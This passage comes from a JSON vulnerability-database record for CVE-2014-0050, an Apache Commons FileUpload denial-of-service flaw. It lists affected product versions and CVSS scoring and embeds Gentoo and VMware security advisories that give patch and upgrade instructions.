            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip analytics 11.0.0-hf2",
            "scope": null,
            "trust": 0.3,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0.0"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip afm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip afm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "centos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "centos",
            "version": "6"
          },
          {
            "_id": null,
            "model": "ip office server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ip office application server sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.02"
          },
          {
            "_id": null,
            "model": "ip office application server sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.01"
          },
          {
            "_id": null,
            "model": "ip office application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "aura conferencing standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "aura conferencing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.2.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tomcat beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tomcat 8.0.0-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "tomcat beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "tomcat beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "20"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.41"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.11"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.14"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.12"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.7"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.7"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.12"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.13"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "vcenter server update",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.52"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.8.2"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.7.3"
          },
          {
            "_id": null,
            "model": "jboss fuse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "jboss a-mq",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.1.0"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.4"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.14"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1200"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.2000"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.8"
          },
          {
            "_id": null,
            "model": "infosphere guardium data redaction",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.1"
          },
          {
            "_id": null,
            "model": "filenet business process framework",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.10"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.123"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.12"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.110"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.20"
          },
          {
            "_id": null,
            "model": "connections cr1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "espace meeting portal v100r001c00spc303",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "anyoffice v200r002c10l00422",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00sph503",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8000"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-04"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.3.2"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.2.6"
          },
          {
            "_id": null,
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16.1"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Red Hat",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          }
        ],
        "trust": 0.5
      },
      "cve": "CVE-2014-0050",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-0050",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-0050",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-0050",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u0027s intended exit conditions. Apache Commons FileUpload is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause the application to enter an infinite loop which may cause denial-of-service conditions. \nThe following products are vulnerable:\nApache Commons FileUpload 1.0 through versions 1.3\nApache Tomcat 8.0.0-RC1 through versions 8.0.1\nApache Tomcat 7.0.0 through versions 7.0.50. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201412-29\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: Apache Tomcat: Multiple vulnerabilities\n     Date: December 15, 2014\n     Bugs: #442014, #469434, #500600, #511762, #517630, #519590\n       ID: 201412-29\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Apache Tomcat, the worst of\nwhich may result in Denial of Service. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  www-servers/tomcat           \u003c 7.0.56                 *\u003e= 6.0.41\n                                                            \u003e= 7.0.56\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Tomcat. Please review\nthe CVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll Tomcat 6.0.x users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=www-servers/tomcat-6.0.41\"\n\nAll Tomcat 7.0.x users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=www-servers/tomcat-7.0.56\"\n\nReferences\n==========\n\n[  1 ] CVE-2012-2733\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2733\n[  2 ] CVE-2012-3544\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3544\n[  3 ] CVE-2012-3546\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3546\n[  4 ] CVE-2012-4431\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4431\n[  5 ] CVE-2012-4534\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4534\n[  6 ] CVE-2012-5885\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5885\n[  7 ] CVE-2012-5886\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5886\n[  8 ] CVE-2012-5887\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5887\n[  9 ] CVE-2013-2067\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2067\n[ 10 ] CVE-2013-2071\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2071\n[ 11 ] CVE-2013-4286\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4286\n[ 12 ] CVE-2013-4322\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4322\n[ 13 ] CVE-2013-4590\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4590\n[ 14 ] CVE-2014-0033\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0033\n[ 15 ] CVE-2014-0050\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0050\n[ 16 ] CVE-2014-0075\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0075\n[ 17 ] CVE-2014-0096\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0096\n[ 18 ] CVE-2014-0099\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0099\n[ 19 ] CVE-2014-0119\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0119\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-29.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Summary\n\n    VMware has updated vSphere third party libraries\n\n2. Relevant releases\n\n \n    VMware vCenter Server 5.5 prior to Update 2\n\n    VMware vCenter Update Manager 5.5 prior to Update 2\n\n    VMware ESXi 5.5 without patch ESXi550-201409101-SG\n\n\n3. Problem Description\n\n   a. vCenter Server Apache Struts Update\n\n      The Apache Struts library is updated to address a security issue.  \n\n      This issue may lead to remote code execution after authentication. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifier CVE-2014-0114 to this issue. \n\n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product\tRunning\tReplace with/\n      Product        Version\ton\t      Apply Patch\n      =============  =======\t=======\t=================\n      vCenter Server 5.5       any         5.5 Update 2\n      vCenter Server 5.1       any         Patch Pending\n      vCenter Server 5.0       any         Patch Pending\n\n   b. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifiers CVE-2013-4590, CVE-2013-4322, and \n      CVE-2014-0050 to these issues. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware                 Product\tRunning    Replace with/\n      Product                Version\ton\t     Apply Patch\n      =============          =======\t=======    =================\n      vCenter Server         5.5     any        5.5 Update 2\n      vCenter Server         5.1     any        Patch Pending\n      vCenter Server         5.0     any        Patch Pending\n \n   c. Update to ESXi glibc package\n\n      glibc is updated to address multiple security issues. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifiers CVE-2013-0242 and CVE-2013-1914 to \n      these issues. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product\tRunning  Replace with/\n      Product        Version\ton\t   Apply Patch\n      =============  =======\t=======  =================\n      ESXi           5.5       any      ESXi550-201409101-SG\n      ESXi           5.1       any      Patch Pending\n      ESXi           5.0       any      Patch Pending\n\nd. vCenter and Update Manager, Oracle JRE 1.7 Update 55\n\n      Oracle has documented the CVE identifiers that are addressed in \n      JRE 1.7.0 update 55 in the Oracle Java SE Critical Patch Update \n      Advisory of April 2014. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware                 Product\tRunning  Replace with/\n      Product                Version\ton       Apply Patch\n      =============          =======\t=======  =================\n      vCenter Server         5.5     any      5.5 Update 2\n      vCenter Server         5.1     any      not applicable *\n      vCenter Server         5.0     any      not applicable *\n      vCenter Update Manager 5.5     any      5.5 Update 2\n      vCenter Update Manager 5.1     any      not applicable *\n      vCenter Update Manager 5.0     any      not applicable *\n \n      * this product uses the Oracle JRE 1.6.0 family *\n\n4. Solution\n\n   Please review the patch/release notes for your product and version \n   and verify the checksum of your downloaded file. \n\n \n   vCenter Server and Update Manager 5.5u2\n   ---------------------------------------\n   Downloads and Documentation:\n   https://www.vmware.com/go/download-vsphere\n\n   ESXi 5.5\n   --------\n   Download:\n   https://www.vmware.com/patchmgr/findPatch.portal\n   \n5. References\n\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914\n\n   JRE\n   ---\n   Oracle Java SE Critical Patch Update Advisory of April 2014\n  \nhttp://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html\n\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n   2014-09-09 VMSA-2014-0008\n   Initial security advisory 